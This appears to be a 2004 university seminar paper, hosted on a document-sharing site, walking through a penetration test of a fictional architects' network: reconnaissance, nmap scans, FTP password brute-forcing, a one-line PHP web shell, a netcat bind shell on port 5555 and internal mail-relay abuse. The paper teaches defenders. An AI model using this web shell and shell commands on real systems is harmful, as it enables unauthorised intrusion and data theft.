Andreas Dittrich, Philipp Reinecke Testing of Network and System Security. example.



Similar documents
Project 2: Penetration Testing (Phase II)

An Introduction to Network Vulnerability Testing

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

INTRODUCTION: PENETRATION TEST A BUSINESS PERSPECTIVE:

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.

Client logo placeholder XXX REPORT. Page 1 of 37

Nessus. A short review of the Nessus computer network vulnerability analysing tool. Authors: Henrik Andersson Johannes Gumbel Martin Andersson

Penetration Testing Report Client: Business Solutions June 15 th 2015

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

Rapid Vulnerability Assessment Report

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Penetration Testing with Kali Linux

Vulnerability Assessment and Penetration Testing

NETWORK PENETRATION TESTING

SCP - Strategic Infrastructure Security

Using Nessus In Web Application Vulnerability Assessments

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

Installing and Configuring Nessus by Nitesh Dhanjani

Security Considerations White Paper for Cisco Smart Storage 1

Five Steps to Improve Internal Network Security. Chattanooga ISSA

EXTRA. Vulnerability scanners are indispensable both VULNERABILITY SCANNER

Penetration Testing Workshop

WHITE PAPER. An Introduction to Network- Vulnerability Testing

Vulnerability Assessment and Penetration Testing. CC Faculty ALTTC, Ghaziabad

Internet Security [1] VU Engin Kirda

Web App Security Audit Services

!!!!!!!!!!!!!!!!!!!!!!

External Network Penetration Test Report

Network and Host-based Vulnerability Assessment

Penetration Testing Walkthrough

REPORT ON AUDIT OF LOCAL AREA NETWORK OF C-STAR LAB

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Vulnerability analysis

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

Advanced Web Security, Lab

STABLE & SECURE BANK lab writeup. Page 1 of 21

Five Steps to Improve Internal Network Security. Chattanooga Information security Professionals

N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work

WEB APPLICATION HACKING. Part 2: Tools of the Trade (and how to use them)

Audience. Pre-Requisites

CMPT 471 Networking II

AN OVERVIEW OF VULNERABILITY SCANNERS

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. ID: My Blog:

Internal Penetration Test

πωχ Notes on Domino Black Hat Las Vegas 2003 Aldora Louw PricewaterhouseCoopers

Discovering passwords in the memory

My FreeScan Vulnerabilities Report

Security from the Cloud

noway.toonux.com 09 January 2014

Web Application Vulnerability Testing with Nessus

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

NETWORK PENETRATION TESTS FOR EHR MANAGEMENT SOLUTIONS PROVIDER

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Foundstone ERS remediation System

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

1 Scope of Assessment

Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins

Nixu SNS Security White Paper May 2007 Version 1.2

Blended Security Assessments

GL550 - Enterprise Linux Security Administration

ENTERPRISE LINUX SECURITY ADMINISTRATION

Computer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1

A Decision Maker s Guide to Securing an IT Infrastructure

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

Evaluation of Penetration Testing Software. Research

SEAGATE BUSINESS NAS ACCESSING THE SHELL. February 1, 2014 by Jeroen Diel IT Nerdbox

Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0.

(WAPT) Web Application Penetration Testing

VoipSwitch Security Audit

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

Web attacks and security: SQL injection and cross-site scripting (XSS)

GL-550: Red Hat Linux Security Administration. Course Outline. Course Length: 5 days

Getting Started in Red Hat Linux An Overview of Red Hat Linux p. 3 Introducing Red Hat Linux p. 4 What Is Linux? p. 5 Linux's Roots in UNIX p.

Top 5 Essential Log Reports

Learn Ethical Hacking, Become a Pentester

SMTP Servers. Determine if an message should be sent to another machine and automatically send it to that machine using SMTP.

Metasploit Pro Getting Started Guide

Penetration Testing. Security Testing

Penetration: from Application down to OS

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

Penetration Testing SIP Services

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

6WRUP:DWFK. Policies for Dedicated IIS Web Servers Group. V2.1 policy module to restrict ALL network access

Lab 3: Recon and Firewalls

Threat Modelling for Web Application Deployment. Ivan Ristic (Thinking Stone)

Host Hardening. Presented by. Douglas Couch & Nathan Heck Security Analysts for ITaP 1

NETWORK SECURITY WITH OPENSOURCE FIREWALL

For more information or call

Lab Objectives & Turn In

Cyber Essentials. Test Specification

Vinny Hoxha Vinny Hoxha 12/08/2009

Firewall implementation and testing

ENTERPRISE LINUX SECURITY ADMINISTRATION

Ethical Hacking Course Layout

Transcription:

Testing of Network and System Security 1 Testing of Network and System Security Introduction The term security when applied to computer networks conveys a plethora of meanings, ranging from network security to process and information security the security of business processes and information handled therein. Likewise, testing said security cannot be narrowed down to simple methods, but has to be adjusted to the type of security it is applied to, to the answers one needs, to time and cost restraints and possibly the most important point to the person interested in the answers. While several approaches 1 for a methodology of testing have been put forward and though there are numerous introductory documents as well as checklists 2 available, the field remains rather overwhelming. This document, written as a paper for the 2004 Security Seminar at Humboldt University, Berlin, aims at giving hints on how to tackle the complex task of testing a network s security. We will lay out a simple scenario, designed with several security holes, and perform a rudimentary penetration test. To really get a grasp on how secure a system is, one has to try every conceivable way to break into it. Time and space constraints as well as limits on what we can model in the network prevent us from doing such a test, so in order to achieve greater detail in what we actually do we will only follow one way and give hints of possible other routes at the various steps. The Scenario We will look at a small network scenario, of the type that provides internet and intranet access as well as the company website for medium-sized businesses such as designers or architects. This will typically consist of several servers and a number of intranet clients and can be expected to have at least one firewall as protection against internet based attacks. In our example the fictional target network will be named www.architekten.de. With the growing importance of mobile computing one could also assume several notebook clients and consequently a wireless network. Note: We ignore this possibility here. In a real-world example, looking at this network would be a very important part of the security test. Insecure configurations of WLANs are a very common occurence, and breaking into the intranet through wireless access is often much easier than performing an external attack. Step 1: Gathering Public Information In most cases, there are several public sources of information such as WHOIS entries, the company website and press releases, postings and documents strewn around the internet, about the target. Exploring these is useful in at least three ways: First, it can already uncover holes in the security. When a company s internal product descriptions are available on their web server or can be found through search engines, then there is obviously no need to break into the system. Note: This can be seen as an aspect of process and information security. In our example there are no such obvious holes, but in a larger setting one should definitely look for them. 1 One example being the Open Source Security Testing Manual, http://www.osstmm.org. 2 The Reconnaissance CheatSheet http://secguru.com/index.php/content/view/12, for example.

Testing of Network and System Security 2 Second, we can gain valuable information for social engineering. Knowledge of names, e-mail addresses and tasks assigned to various employees is useful in feigning identities in order to gain access to the network or to internal documents. Note: Because our scenario comprises only a network of computers without real humans we will not follow this road here. Third, tidbits found thereby can often help leverage subsequent attacks. In our example, while browsing the company website, we find a password protected part called Internes. As in most cases, the username as well as the password are made to be easily memorizable, here, through a few attempts we find the pair to be buero/andrea andrea being the first name of the system administrator. On the protected page there is an announcement of a Freeciv deathmatch, giving a tip on how to configure the client to be able to join from home: Use port 5555. In itself this does not give us much, but we will note it for later use. Our target did only exhibit one security flaw, the easily guessable password for the internal page. Step 2: Extract basic system information We are now interested in more technical details of the target system: How is the network structured? Which Operating Systems are powering the machines? Which services are provided? To answer these, we have to scan the system, employing either an automated test as provided by the Nessus network security scanner 3 or a manual test. Nessus would quickly provide us with a complete report of the hosts and associated services it encountered. When told so, it would even test the services for known vulnerabilities and enrich the report by information regarding the fixing of these holes. Note: While Nessus can be very useful for gaining information it also poses the risk of crashing the target system. Furthermore, its very core concept depends on holes being known, so a hole created by configuration mistakes will often be overlooked, simply because humans are much more creative than computer programs. A positive Nessus report can therefore not provide a substitute for a human-performed test. In our example we do a combination of automated and manual test. We first scan the system using Nessus with Dangerous Modules disabled. The main use of the report generated here lies in giving us information about the programs that provide the services found. Even though Nessus output already gives us most of what we will get when using the popular network scanner nmap, 4 we briefly show this alternative: # nmap -ss -sr -sv -O -vv www.architekten.de Interesting ports on www.architekten.de (192.168.0.50): (The 1655 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 21/tcp open ftp 3 http://www.nessus.org 4 http://www.insecure.org/nmap

Testing of Network and System Security 3 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 1.3.29 ((Unix) PHP/3.0.18) 110/tcp open pop3 Courier Pop3 This provides us with the information that the target host has DNS, FTP, HTTP, SMTP and POP3 running. Trying to identify the OS does not give a clear answer. Since nmap is usually pretty accurate in its guessings, we can assume to be talking to a firewall behind which several servers are located. To test this, we will let nmap fingerprint the OS by using single ports as well as combinations, with the rationale that certain services are commonly run on the same machine: # nmap -ss -sr -sv -O -vv -p 25,110 www.architekten.de Repeating this with the combination of ports 21 and 80 leaves us with the knowledge that we are in fact talking to two servers, one running Linux and providing Mail functionality, the other running FreeBSD and acting as an FTP/WWW server. We also know that FTP is provided by OpenFTPD, WWW is provided by Apache, SMTP and POP3 are handled by Postfix and Courier, respectively. Step 3: Trying to compromise the system We now look for a way to compromise this system. The Linux server seems quite secure on first sight. Postfix is known as an easy to configure and higly secure mailserver. As of today we know of no exploitable security-holes. We try to send an unauthorized mail from outside to check wether it can be abused as an open relay for spamming. This attempt is rejected. Note: we could proceed with checking the pop3 server for holes such as bufferoverflows and weak passwords. The first would possibly allow us to gain remote access or to launch a denial of service attack. The second would give us a possibility to read the employees e-mail. Since we will do a like attack on another service we will not demonstrate this here. We now focus on the FreeBSD machine running Apache and OpenFTPD. From the Nessus report we know that this Apache runs PHP in a vulnerable version. We could try to directly exploit weaknesses. Likewise we could also attempt to gain root access through one of the many exploitable format string vulnerabilities recently discovered in OpenFTPD. Instead, we try a less invasive attack since we do not want to crash any service. The type of attack shwon here has been described by Peter van Dijk 5. It relies on uploading a PHP script that executes commands passed to it as parameters. This is than used to open a remote shell owned by the unprivileged www user. First we need an ftp login. Encouraged by the weak password for the internal website of the company we choose to launch a brute force attack against the ftp daemon. We use the employees names as found on the website and severeal standard logins such as root, www and admin. The password cracker John the Ripper 6 can generate lists of common passwords from a given wordlist: 5 Peter van Dijk, How apache.org was defaced, http://www.megasecurity.org/info/apache. org.txt 6 http://www.openwall.com/john

Testing of Network and System Security 4 # john -w:users -rules -stdout:8 > passwd We then try to login using all user/password pairs from both lists. Fortunately this succeeds with the password admin for the user www. Connecting this account reveals the www root directory open with read/write access. We now upload the PHP script wuh.php3 : <? passthru($cmd);?> To test it we connect to the script: # lynx http://www.architekten.de/wuh.php3?cmd=uname+-a and receive the usual uname output of FreeBSD. This script already gives us rather high privileges on the remote system, but we still need a shell to dig deeper into the network which would be rather complicated this way. We now upload a netcat source package, extract, compile and execute it: # lynx www.architekten.de/wuh.php3?cmd=tar+-xzf+nc.tgz # lynx www.architekten.de/wuh.php3?cmd=make+freebsd # lynx www.architekten.de/wuh/php3?cmd=./nc+-p+5555+-l+\ -e+/bin/sh We utilize port 5555 since we suspect the firewall still allows it through to the server. On our attack system we issue the command: $ uname Linux $ netcat www.architekten.de 5555 uname FreeBSD Note: We did not attempt every conceivable way to gain access. Furthermore we omit the whole process of privilege escalation. In a real world scenario both aspects would have to be tested. Step 4: Utilizing the shell Using the now interactive access to the system we thoroughly check the FreeBSD box as limited by the privileges of the www account. These allow us to enumerate running services, read their configuration files and some of the logs. This gives us a decent knowledge of the intranet behind the DMZ. Furthermore we find that the internal file server (Samba) runs on this machine. We can access its contents thus recieve profound information on the organisation. Most likely all the company s working data is compromised.

Testing of Network and System Security 5 Inside the DMZ we use nmap to complete our knowledge infrastructure of the network behind the firewall: 7 nmap -sp 192.168.0.1-254 Note: There are many more ways to attack the network from an internal position. We only show one, the exploitation of internal trust relationships, detailed using the example of the mailserver. Remembering that relaying was denied from outside the local network we now retry it: telnet mail 25 helo mail mail from: bush@whitehouse.gov rcpt to: gates@microsoft.com data. quit Message accepted for delivery Of course this poses a great risk to the company s reputation as well as to its security. Note: The last two steps would consist of trying to compromise internal hosts and to write a detailed report about the methology used and the issues found. We should also point at ways to improve security. Conclusion We hope to have succeeded in showing how a reasonably secure network can be compromised through several trivial weaknesses by a human attacker. Most of these may have been found by automated scanning, but their real impact only shows when they are exploited in a creative way. Had we not been able to brute-force access to the internal site as well as to the FTP server, we would have had to resort to using an exploit against one of the servers an attack which can easily be avoided by keeping the software upto-date. If the firewall had not been configured in such a way as to still forward the now unused Freeciv port, we would not have been able to connect to the remote shell. So this paper demonstrates once again that security must be enforced in all details of a network since a real attacker will always find and combine weak spots to attain his goal. 7 In case nmap is not installed here we could upload a statically linked version as shown above.

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information